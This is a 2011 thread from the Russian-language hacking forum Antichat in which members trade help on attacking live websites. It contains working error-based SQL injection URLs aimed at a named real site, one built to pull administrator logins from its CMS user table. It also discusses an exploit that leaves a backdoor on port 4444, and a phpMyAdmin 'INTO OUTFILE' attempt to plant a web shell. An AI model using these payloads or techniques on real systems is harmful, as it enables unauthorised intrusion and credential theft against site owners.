ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.06.2011, 18:41
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
http://jetterauto.ru/index/blog/id/4 or 1 group by concat(version(),rand(0)|0) having min(0)--+
|
|
|

28.06.2011, 18:43
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме: 58401
Репутация:
0
|
|
Сообщение от qaz
qaz said:
убрал, тотже ифект
вывода и не будет, потому что это блайнд. в данном случае можно добиться вывода в ошибке. раскрутил по методу qwazar'a :
Код HTML:
HTML:
http://jetterauto.ru/index/page/id/411+and+1=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cms_user_list.login,0x27,0x7e)+from+mainfra_jetter_tst.cms_user_list+order+by+login+limit+0,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
|
|
|

28.06.2011, 19:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 34360
Репутация:
1
|
|
Сообщение от plaeer
plaeer said:
Я тоже смотрел код сплоита, и не увидел там ничего связанного с портом 4444. Поэтому предположил, что в sos.txt код бэкдора который открыл порт 4444. хз где взять этот код...
Что никто не может помочь?
|
|
|
|

28.06.2011, 20:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 54576
Репутация:
8
|
|
Сообщение от plaeer
plaeer said:
Что никто не может помочь?
Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.
|
|
|
|

28.06.2011, 21:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 34360
Репутация:
1
|
|
Сообщение от R0nin
R0nin said:
Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.
Вообще-то эту уязвимость обнаружил сканер.
|
|
|
|

28.06.2011, 21:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 34360
Репутация:
1
|
|
Сам сплоит - http://www.securitylab.ru/poc/391481.php
|
|
|
|

28.06.2011, 22:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 54576
Репутация:
8
|
|
Сообщение от plaeer
plaeer said:
Сам сплоит - http://www.securitylab.ru/poc/391481.php
Сканер может ошибится.
ПО может иметь уязвимую версию но при этом таки может быть пропатченным.
|
|
|
|

28.06.2011, 22:32
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме: 2212846
Репутация:
56
|
|
Сообщение от plaeer
plaeer said:
Вообще-то эту уязвимость обнаружил сканер.
Ну раз сканер, тогда это координально меняет ситуацию
|
|
|

29.06.2011, 13:28
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме: 318186
Репутация:
2
|
|
Траблы с залитием шела через phpmyadmin
File_priv : Y
Делаю запрос :
SELECT '' into OUTFILE '/var/www/html/web/site.com/shell.php'
Мне в ответ:
#1 - Can't create/write to file '/var/www/html/web/site.com/shell.php' (Errcode: 13)
Почему вылазит такая ошибка и файл не создается?
|
|
|

29.06.2011, 13:30
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Прав нет же
На запись в папку.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|